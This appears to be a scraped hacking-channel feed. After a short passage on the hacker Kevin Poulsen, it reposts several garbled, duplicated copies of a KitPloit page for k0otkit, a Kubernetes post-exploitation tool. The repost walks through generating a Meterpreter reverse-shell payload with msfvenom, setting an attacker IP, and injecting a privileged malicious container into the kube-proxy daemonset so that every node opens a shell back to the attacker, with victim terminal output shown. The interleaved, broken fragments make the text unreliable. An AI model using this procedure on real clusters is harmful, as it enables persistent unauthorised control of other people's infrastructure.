He started with a TRS-80 computer, armed only with his curiosity and skill, he managed to shake up the world and expose the leaky security of the ARPANET network. Through his actions, the security of those networks was improved dramatically over the next years and paved the way for future network security.
Kevin is one of many hackers who reinvented themselves and help the cyber security space to become more robust with his skills, vision, and pragmatic approach to secure communication.
References:
⦿ The Last Hacker : He Called Himself Dark Dante. – Wired ⦿ Kevin Poulsen – Fantom Wiki ⦿ 10 MOST INSANE HACKING STORIES—EVER!
⦿ Kevin Poulsen Wikipedia https://www.blackhatethicalhacking.com/wp-content/uploads/2022/03/Merch-1024x1024.png Recent Articles* https://www.blackhatethicalhacking.com/wp-content/uploads/2022/05/The-Difference-between-Vulnerability-Assessment-and-Pentesting.-90x90.png The Difference between Vulnerability Assessment and Pentesting4 days ago
* https://www.blackhatethicalhacking.com/wp-content/uploads/2022/04/Find-hidden-and-encrypted-secrets-from-any-website-90x90.png Write up: Find hidden and encrypted secrets from any website4 weeks ago
* https://www.blackhatethicalhacking.com/wp-content/uploads/2022/04/Darkside-hacker-group-90x90.png Darkside hacker group, the group that provides ransomware as a service1 month ago
* https://www.blackhatethicalhacking.com/wp-content/uploads/2022/04/How-to-schedule-tasks-the-right-way-in-Linux-using-crontab-90x90.png Write up: How to schedule tasks the right way in Linux, using crontab1 month ago
* https://www.blackhatethicalhacking.com/wp-content/uploads/2022/04/Hacking-is-an-art-and-so-is-subdomain-enumeration-90x90.png Write up: Hacking is an art, and so is subdomain enumeration.2 months ago
* https://www.blackhatethicalhacking.com/wp-content/uploads/2022/03/Articles_Gallery-90x90.png Lizard Squad – the infamous hacking group that brought Xbox and PlayStation networks to their knees.2 months ago
* https://www.blackhatethicalhacking.com/wp-content/uploads/2022/03/Hide-data-in-images-and-extract-them-90x90.png Write up: Steganography: Hide data in images and extract them3 months ago
* https://www.blackhatethicalhacking.com/wp-content/uploads/2022/02/MafiaBoy-the-hacker-who-took-down-the-Internet-90x90.png Hacking stories: MafiaBoy, the hacker who took down the Internet3 months ago
* https://www.blackhatethicalhacking.com/wp-content/uploads/2022/02/Detect-malicious-hacker-activities-on-endpoints-90x90.png Write up: Detect malicious hacker activities on endpoints3 months ago
* https://www.blackhatethicalhacking.com/wp-content/uploads/2022/01/Articles_Gallery-90x90.png How ILOVEYOU worm became the first global computer virus pandemic4 months ago
The post Kevin Poulsen, aka Dark Dante, and his hacking activities on ARPANET’s networks first appeared on Black Hat Ethical Hacking.
___________________________
@hacking_Attack
@Hacking_Video
K0Otkit - Universal Post-Penetration Technique Which Could Be Used In Penetrations Against Kubernetes Clusters
http://www.kitploit.com/2022/05/k0otkit-universal-post-penetration.html
___________________________
@hacking_Attack
@Hacking_Video
http://www.kitploit.com/2022/05/k0otkit-universal-post-penetration.html
___________________________
@hacking_Attack
@Hacking_Video
KitPloit - PenTest & Hacking Tools
K0Otkit - Universal Post-Penetration Technique Which Could Be Used In Penetrations Against Kubernetes Clusters
Usage Make sure you have got the root shell on the master node of the target Kubernetes. (You can also utilize k0otkit if you have the admin privilege of the target Kubernetes, though you might need to modify the kubectl command in k0otkit_template.sh to use the token or certification.) Make sure you have installed Metasploit (https://www.kitploit.com/search/label/Metasploit) on your attacker host (msfvenom and msfconsole should be available). Deploy k0otkit Clone this repository: git clone https://github.com/brant-ruan/k0otkit
cd k0otkit/
chmod +x ./*.sh Replace the attacker's IP and port in pre_exp.sh with your own IP and port: ATTACKER_IP=192.168.1.107
ATTACKER_PORT=4444 Generate k0otkit: ./pre_exp.sh k0otkit.sh will be generated. Then run the reverse shell handler: ./handle_multi_reverse_shell.sh Once the handler is ready, copy the content of k0otkit.sh and paste it into your shell on the master node of the target Kubernetes, then press to execute it. Wait a moment and enjoy reverse shells (https://www.kitploit.com/search/label/Reverse%20Shells) from all nodes :) P.S. It is not limited how many Kubernetes clusters you manipulate with k0otkit. Interact with Shells After the successful deployment of k0otkit, you can interact with any reverse shell as you want: # within msfconsole
sessions 1 Features utilize K8s resources and features (hack K8s in a K8s way) dynamic container injection communication encryption (https://www.kitploit.com/search/label/Encryption) (thanks to Meterpreter) fileless Example Generate k0otkit: kali@kali:~/k0otkit$ ./pre_exp.sh
+ ATTACKER_IP=192.168.1.107
+ ATTACKER_PORT=4444
+ TEMP_MRT=mrt
+ msfvenom -p linux/x86/meterpreter/reverse_tcp LPORT=4444 LHOST=192.168.1.107 -f elf -o mrt
++ xxd -p mrt
++ tr -d '\n'
++ base64 -w 0
+ PAYLOAD=N2Y0NTRjNDYwMTAxMDEwMDAwMDAwMDAwMDAwMDAwMDAwMjAwMDMwMDAxMDAwMDAwNTQ4MDA0MDgzNDAwMDAwMDAwMDAwMDAwMDAwMDAwMDAzNDAwMjAwMDAxMDAwMDAwMDAwMDAwMDAwMTAwMDAwMDAwMDAwMDAwMDA4MDA0MDgwMDgwMDQwOGNmMDAwMDAwNGEwMTAwMDAwNzAwMDAwMDAwMTAwMDAwNmEwYTVlMzFkYmY3ZTM1MzQzNTM2YTAyYjA2Njg5ZTFjZDgwOTc1YjY4YzBhODEzZjM2ODAyMDAxMTVjODllMTZhNjY1ODUwNTE1Nzg5ZTE0M2NkODA4NWMwNzkxOTRlNzQzZDY4YTIwMDAwMDA1ODZhMDA2YTA1ODllMzMxYzljZDgwODVjMDc5YmRlYjI3YjIwN2I5MDAxMDAwMDA4OWUzYzFlYjBjYzFlMzBjYjA3ZGNkODA4NWMwNzgxMDViODllMTk5YjI2YWIwMDNjZDgwODVjMDc4MDJmZmUxYjgwMTAwMDAwMGJiMDEwMDAwMDBjZDgw
+ sed s/PAYLOAD_VALUE_BASE64/N2Y0NTRjNDYwMTAxMDEwMDAwMDAwMDAwMDAwMDAwMDAwMjAwMDMwMDAxMDAwMDAwNTQ4MDA0MDgzNDAwMDAwMDAwMDAwMDAwMDAwMDAwMDAzNDAwMjAwMDAx MDAwMDAwMDAwMDAwMDAwMTAwMDAwMDAwMDAwMDAwMDA4MDA0MDgwMDgwMDQwOGNmMDAwMDAwNGEwMTAwMDAwNzAwMDAwMDAwMTAwMDAwNmEwYTVlMzFkYmY3ZTM1MzQzNTM2YTAyYjA2Njg5ZTFjZDgwOTc1YjY4YzBhODEzZjM2ODAyMDAxMTVjODllMTZhNjY1ODUwNTE1Nzg5ZTE0M2NkODA4NWMwNzkxOTRlNzQzZDY4YTIwMDAwMDA1ODZhMDA2YTA1ODllMzMxYzljZDgwODVjMDc5YmRlYjI3YjIwN2I5MDAxMDAwMDA4OWUzYzFlYjBjYzFlMzBjYjA3ZGNkODA4NWMwNzgxMDViODllMTk5YjI2YWIwMDNjZDgwODVjMDc4MDJmZmUxYjgwMTAwMDAwMGJiMDEwMDAwMDBjZDgw/g k0otkit_template.sh
Run the reverse shell handler: kali@kali:~/k0otkit$ ./handle_multi_reverse_shell.sh
payload => linux/x86/meterpreter/reverse_tcp
LHOST => 0.0.0.0
LPORT => 4444
ExitOnSession => false
[*] Exploit running as background job 0.
[*] Exploit completed, but no session was created.
[*] Started reverse TCP handler on 0.0.0.0:4444
msf5 exploit(multi/handler) >
Copy the content of k0otkit.sh into your shell on the master node of the target Kubernetes and press : kali@kali:~$ nc -lvnp 10000
listening on [any] 10000 ...
connect to [192.168.1.107] from (UNKNOWN) [192.168.1.106] 48750
root@victim-2:~# volume_name=cache
mount_path=/var/kube-proxy-cache
ctr_name=kube-proxy-cache
binary_file=/usr/local/bin/kube-proxy-cache
payload_name=cache
secret_name=proxy-cache
secret_data_name=content
ctr_line_num=$(kubectl --kubeconfig /root/.kube/config -n kube-system get daemonsets kube-proxy -o yaml | awk '/ containers:/{print NR}')
___________________________
@hacking_Attack
@Hacking_Video
cd k0otkit/
chmod +x ./*.sh Replace the attacker's IP and port in pre_exp.sh with your own IP and port: ATTACKER_IP=192.168.1.107
ATTACKER_PORT=4444 Generate k0otkit: ./pre_exp.sh k0otkit.sh will be generated. Then run the reverse shell handler: ./handle_multi_reverse_shell.sh Once the handler is ready, copy the content of k0otkit.sh and paste it into your shell on the master node of the target Kubernetes, then press to execute it. Wait a moment and enjoy reverse shells (https://www.kitploit.com/search/label/Reverse%20Shells) from all nodes :) P.S. It is not limited how many Kubernetes clusters you manipulate with k0otkit. Interact with Shells After the successful deployment of k0otkit, you can interact with any reverse shell as you want: # within msfconsole
sessions 1 Features utilize K8s resources and features (hack K8s in a K8s way) dynamic container injection communication encryption (https://www.kitploit.com/search/label/Encryption) (thanks to Meterpreter) fileless Example Generate k0otkit: kali@kali:~/k0otkit$ ./pre_exp.sh
+ ATTACKER_IP=192.168.1.107
+ ATTACKER_PORT=4444
+ TEMP_MRT=mrt
+ msfvenom -p linux/x86/meterpreter/reverse_tcp LPORT=4444 LHOST=192.168.1.107 -f elf -o mrt
++ xxd -p mrt
++ tr -d '\n'
++ base64 -w 0
+ PAYLOAD=N2Y0NTRjNDYwMTAxMDEwMDAwMDAwMDAwMDAwMDAwMDAwMjAwMDMwMDAxMDAwMDAwNTQ4MDA0MDgzNDAwMDAwMDAwMDAwMDAwMDAwMDAwMDAzNDAwMjAwMDAxMDAwMDAwMDAwMDAwMDAwMTAwMDAwMDAwMDAwMDAwMDA4MDA0MDgwMDgwMDQwOGNmMDAwMDAwNGEwMTAwMDAwNzAwMDAwMDAwMTAwMDAwNmEwYTVlMzFkYmY3ZTM1MzQzNTM2YTAyYjA2Njg5ZTFjZDgwOTc1YjY4YzBhODEzZjM2ODAyMDAxMTVjODllMTZhNjY1ODUwNTE1Nzg5ZTE0M2NkODA4NWMwNzkxOTRlNzQzZDY4YTIwMDAwMDA1ODZhMDA2YTA1ODllMzMxYzljZDgwODVjMDc5YmRlYjI3YjIwN2I5MDAxMDAwMDA4OWUzYzFlYjBjYzFlMzBjYjA3ZGNkODA4NWMwNzgxMDViODllMTk5YjI2YWIwMDNjZDgwODVjMDc4MDJmZmUxYjgwMTAwMDAwMGJiMDEwMDAwMDBjZDgw
+ sed s/PAYLOAD_VALUE_BASE64/N2Y0NTRjNDYwMTAxMDEwMDAwMDAwMDAwMDAwMDAwMDAwMjAwMDMwMDAxMDAwMDAwNTQ4MDA0MDgzNDAwMDAwMDAwMDAwMDAwMDAwMDAwMDAzNDAwMjAwMDAx MDAwMDAwMDAwMDAwMDAwMTAwMDAwMDAwMDAwMDAwMDA4MDA0MDgwMDgwMDQwOGNmMDAwMDAwNGEwMTAwMDAwNzAwMDAwMDAwMTAwMDAwNmEwYTVlMzFkYmY3ZTM1MzQzNTM2YTAyYjA2Njg5ZTFjZDgwOTc1YjY4YzBhODEzZjM2ODAyMDAxMTVjODllMTZhNjY1ODUwNTE1Nzg5ZTE0M2NkODA4NWMwNzkxOTRlNzQzZDY4YTIwMDAwMDA1ODZhMDA2YTA1ODllMzMxYzljZDgwODVjMDc5YmRlYjI3YjIwN2I5MDAxMDAwMDA4OWUzYzFlYjBjYzFlMzBjYjA3ZGNkODA4NWMwNzgxMDViODllMTk5YjI2YWIwMDNjZDgwODVjMDc4MDJmZmUxYjgwMTAwMDAwMGJiMDEwMDAwMDBjZDgw/g k0otkit_template.sh
Run the reverse shell handler: kali@kali:~/k0otkit$ ./handle_multi_reverse_shell.sh
payload => linux/x86/meterpreter/reverse_tcp
LHOST => 0.0.0.0
LPORT => 4444
ExitOnSession => false
[*] Exploit running as background job 0.
[*] Exploit completed, but no session was created.
[*] Started reverse TCP handler on 0.0.0.0:4444
msf5 exploit(multi/handler) >
Copy the content of k0otkit.sh into your shell on the master node of the target Kubernetes and press : kali@kali:~$ nc -lvnp 10000
listening on [any] 10000 ...
connect to [192.168.1.107] from (UNKNOWN) [192.168.1.106] 48750
root@victim-2:~# volume_name=cache
mount_path=/var/kube-proxy-cache
ctr_name=kube-proxy-cache
binary_file=/usr/local/bin/kube-proxy-cache
payload_name=cache
secret_name=proxy-cache
secret_data_name=content
ctr_line_num=$(kubectl --kubeconfig /root/.kube/config -n kube-system get daemonsets kube-proxy -o yaml | awk '/ containers:/{print NR}')
___________________________
@hacking_Attack
@Hacking_Video
Kitploit
Kitploit – Maintenance in Progress
Kitploit is temporarily under maintenance. We’ll be back shortly with improvements.
volume_line_num=$(kubectl --kubeconfig /root/.kube/config -n kube-system get daemonsets kube-proxy -o yaml | awk '/ volumes:/{print NR}')
image=$(kubectl --kubeconfig /root/.kube/config -n kube-system get daemonsets kube-proxy -o yaml | grep " image:" | awk '{print $2}')
# create payload secret
cat << EOF | kubectl --kubeconfig /root/.kube/config apply -f -
apiVersion: v1
kind: Secret
metad ata:
name: $secret_name
namespace:volume_name=cache
root@victim-2:~#
root@victim-2:~# mount_path=/var/kube-p kube-system
type: Opaque
data:
$secret_data_name: N2Y0NTRjNDYwMTAxMDEwMDAwMDAwMDAwMDAwMDAwMDAwMjAwMDMwMDAxMDAwMDAwNTQ4MDA0MDgzNDAwMDAwMDAwMDAwMDAwMDAwMDAwMDAzNDAwMjAwMDAxMDAwMDAwMDAwMDAwMDAwMTAwMDAwMDAwMDAwMDAwMDA4MDA0MDgwMDgwMDQwOGNmMDAwMDAwNGEwMTAwMDAwNzAwMDAwMDAwMTAwMDAwNmEwYTVlMzFkYmY3ZTM1MzQzNTM2YTAyYjA2Njg5ZTFjZDgwOTc1YjY4YzBhODEzZjM2ODAyMDAxMTVjODllMTZhNjY1ODUwNTE1Nzg5ZTE0M2NkODA4NWMwNzkxOTRlNzQzZDY4YTIwMDAwMDA1ODZhMDA2YTA1ODllMzMxYzljZDgwODVjMDc5YmRlYjI3YjIwN2I5MDAxMDAwMDA4OWUzYzFlYjBjYzFlMzBjYjA3ZGNkODA4NWMwNzgxMDViODllMTk5YjI2YWIwMDNjZDgwODVjMDc4MDJmZmUxYjgwMTAwMDAwMGJiMDEwMDAwMDBjZDgw
EOF
# assume that ctr_line_num < volume_line_num
# otherwise you should switch the two sed commands below
# inject malicious container into kube-proxy pod
kubecroxy-cache
root@victim-2:~#
root@victim-2:~# ctr_n ame=kube-proxy-cache
root@victim-2:~#
root@victim-2:~# binary_file=/usr/local/bin/kube-proxy-cache
root@victim-2:~#
root@victim-2:~# payload_name=cache
root@victim-2:~#
root@victim-2:~# secret_name=proxy-cache
root@victim-2:~#
root@victim-2:~# secret_data_name=content
root@victim-2:~#
root@victim-2:~# ctr_line_num=$(kubectl --kubeconfig /root/.kube/config -n kube-system get daemonsets kube-tl --kubeconfig /root/.kube/config -n kube-system get daemonsets kube-proxy -o yaml \
| sed "$volume_line_num a\ \ \ \ \ \ - name: $volume_name\n hostPath:\n path: /\n type: Directory\n" \
| sed "$ctr_line_num a\ \ \ \ \ \ - name: $ctr_name\n image: $image\n imagePullPolicy: IfNotPresent\n command: [\"sh\"]\n args: [\"-c\", \"echo \$$payload_name | perl -e 'my \$n=qq(); my \$fd=syscall(319, \$n, 1); open(\$FH, qq(>&=).\$fd); select((select(\$FH), \$|=1)[0]); print \$FH pack q/H*/, ; my \$pid = fork(); if (0 != \$pid) { wait }; if (0 == \$pid){system(qq(/proc/\$\$\$\$/fd/\$fd))}'\"]\n env:\n - name: $payload_name\n valueFrom:\n secretKeyRef:\n pr name: $secret_name\n key: $secret_data_name\n securityContext:\n privileged: true\n volumeMounts:\n - mountPath: $mount_path\n name: $volume_name" \
containers:/{print NR}')oxy -o yaml | awk '/
root@victim-2:~#
root@victim-2:~# volume_line_num=$(kubectl --kubeconfig /root/.kube/config -n kube-system get daemonsets kube-proxy -o yaml | awk '/ volumes:/{print NR}')
root@victim-2:~#
root@victim-2:~# image=$(kubectl --kubeconfig /root/.kube/config -n kube-system get daemonsets kube-proxy -o yaml | grep " image:" | awk '{print $2}')
root@victim-2:~#
root@victim-2:~# # create payload secret
root@victim-2:~# cat << EOF | kubectl --kubeconfig /root/.kube/config apply -f -
> apiVersion: v1
> kind: Secret
> metadata:
> name: $secret_name
> namespace: kube-system
> type: Opaque
> data:
> $secret_data_name: N2Y0NTRjNDYwMTAxMDEwMDAwMDAwMDAwMDAwMDAwMDAwMjAwMDMwMDAxMDAwMDAwNTQ4MDA0MDgzNDAwMDAwMDAwMDAwMDAwMDAwMDAwMDAzNDAwMjAwMDAxMDAwMDAwMDAwMDAwMDAwMTAwMDAwMDAwMDAwMDAwMDA4MDA0MDgwMDgwMDQwOGNmMDAwMDAwNGEwMTAwMDAwNzAwMDAwMDAwMTAwMDAwNmEwYTVlMzFkYmY3ZTM1MzQzNTM2YTAyYjA2Njg5ZTFjZDgwOTc1YjY4YzBhODEzZjM2ODAyMDAxMTVjODllMTZhNjY1ODUwNTE1Nzg5ZTE0M2NkODA4NWMwNzkxOTRlNzQzZDY4YTIwMDAwMDA1ODZhMDA2YTA1ODllMzMxYzljZDgwODVjMDc5YmRlYjI3YjIwN2I5MDAxMDAwMDA4OWUzYzFlYjBjYzFlMzBjYjA3ZGNkODA4NWMwNzgxMDViODllMTk5YjI2YWIwMDNjZDgwODVjMDc4MDJmZmUxYjgwMTAwMDAwMGJiMDEwMDAwMDBjZDgw
> EOF
secret/proxy-cache created
root@victim-2:~#
___________________________
@hacking_Attack
@Hacking_Video
image=$(kubectl --kubeconfig /root/.kube/config -n kube-system get daemonsets kube-proxy -o yaml | grep " image:" | awk '{print $2}')
# create payload secret
cat << EOF | kubectl --kubeconfig /root/.kube/config apply -f -
apiVersion: v1
kind: Secret
metad ata:
name: $secret_name
namespace:volume_name=cache
root@victim-2:~#
root@victim-2:~# mount_path=/var/kube-p kube-system
type: Opaque
data:
$secret_data_name: N2Y0NTRjNDYwMTAxMDEwMDAwMDAwMDAwMDAwMDAwMDAwMjAwMDMwMDAxMDAwMDAwNTQ4MDA0MDgzNDAwMDAwMDAwMDAwMDAwMDAwMDAwMDAzNDAwMjAwMDAxMDAwMDAwMDAwMDAwMDAwMTAwMDAwMDAwMDAwMDAwMDA4MDA0MDgwMDgwMDQwOGNmMDAwMDAwNGEwMTAwMDAwNzAwMDAwMDAwMTAwMDAwNmEwYTVlMzFkYmY3ZTM1MzQzNTM2YTAyYjA2Njg5ZTFjZDgwOTc1YjY4YzBhODEzZjM2ODAyMDAxMTVjODllMTZhNjY1ODUwNTE1Nzg5ZTE0M2NkODA4NWMwNzkxOTRlNzQzZDY4YTIwMDAwMDA1ODZhMDA2YTA1ODllMzMxYzljZDgwODVjMDc5YmRlYjI3YjIwN2I5MDAxMDAwMDA4OWUzYzFlYjBjYzFlMzBjYjA3ZGNkODA4NWMwNzgxMDViODllMTk5YjI2YWIwMDNjZDgwODVjMDc4MDJmZmUxYjgwMTAwMDAwMGJiMDEwMDAwMDBjZDgw
EOF
# assume that ctr_line_num < volume_line_num
# otherwise you should switch the two sed commands below
# inject malicious container into kube-proxy pod
kubecroxy-cache
root@victim-2:~#
root@victim-2:~# ctr_n ame=kube-proxy-cache
root@victim-2:~#
root@victim-2:~# binary_file=/usr/local/bin/kube-proxy-cache
root@victim-2:~#
root@victim-2:~# payload_name=cache
root@victim-2:~#
root@victim-2:~# secret_name=proxy-cache
root@victim-2:~#
root@victim-2:~# secret_data_name=content
root@victim-2:~#
root@victim-2:~# ctr_line_num=$(kubectl --kubeconfig /root/.kube/config -n kube-system get daemonsets kube-tl --kubeconfig /root/.kube/config -n kube-system get daemonsets kube-proxy -o yaml \
| sed "$volume_line_num a\ \ \ \ \ \ - name: $volume_name\n hostPath:\n path: /\n type: Directory\n" \
| sed "$ctr_line_num a\ \ \ \ \ \ - name: $ctr_name\n image: $image\n imagePullPolicy: IfNotPresent\n command: [\"sh\"]\n args: [\"-c\", \"echo \$$payload_name | perl -e 'my \$n=qq(); my \$fd=syscall(319, \$n, 1); open(\$FH, qq(>&=).\$fd); select((select(\$FH), \$|=1)[0]); print \$FH pack q/H*/, ; my \$pid = fork(); if (0 != \$pid) { wait }; if (0 == \$pid){system(qq(/proc/\$\$\$\$/fd/\$fd))}'\"]\n env:\n - name: $payload_name\n valueFrom:\n secretKeyRef:\n pr name: $secret_name\n key: $secret_data_name\n securityContext:\n privileged: true\n volumeMounts:\n - mountPath: $mount_path\n name: $volume_name" \
containers:/{print NR}')oxy -o yaml | awk '/
root@victim-2:~#
root@victim-2:~# volume_line_num=$(kubectl --kubeconfig /root/.kube/config -n kube-system get daemonsets kube-proxy -o yaml | awk '/ volumes:/{print NR}')
root@victim-2:~#
root@victim-2:~# image=$(kubectl --kubeconfig /root/.kube/config -n kube-system get daemonsets kube-proxy -o yaml | grep " image:" | awk '{print $2}')
root@victim-2:~#
root@victim-2:~# # create payload secret
root@victim-2:~# cat << EOF | kubectl --kubeconfig /root/.kube/config apply -f -
> apiVersion: v1
> kind: Secret
> metadata:
> name: $secret_name
> namespace: kube-system
> type: Opaque
> data:
> $secret_data_name: N2Y0NTRjNDYwMTAxMDEwMDAwMDAwMDAwMDAwMDAwMDAwMjAwMDMwMDAxMDAwMDAwNTQ4MDA0MDgzNDAwMDAwMDAwMDAwMDAwMDAwMDAwMDAzNDAwMjAwMDAxMDAwMDAwMDAwMDAwMDAwMTAwMDAwMDAwMDAwMDAwMDA4MDA0MDgwMDgwMDQwOGNmMDAwMDAwNGEwMTAwMDAwNzAwMDAwMDAwMTAwMDAwNmEwYTVlMzFkYmY3ZTM1MzQzNTM2YTAyYjA2Njg5ZTFjZDgwOTc1YjY4YzBhODEzZjM2ODAyMDAxMTVjODllMTZhNjY1ODUwNTE1Nzg5ZTE0M2NkODA4NWMwNzkxOTRlNzQzZDY4YTIwMDAwMDA1ODZhMDA2YTA1ODllMzMxYzljZDgwODVjMDc5YmRlYjI3YjIwN2I5MDAxMDAwMDA4OWUzYzFlYjBjYzFlMzBjYjA3ZGNkODA4NWMwNzgxMDViODllMTk5YjI2YWIwMDNjZDgwODVjMDc4MDJmZmUxYjgwMTAwMDAwMGJiMDEwMDAwMDBjZDgw
> EOF
secret/proxy-cache created
root@victim-2:~#
___________________________
@hacking_Attack
@Hacking_Video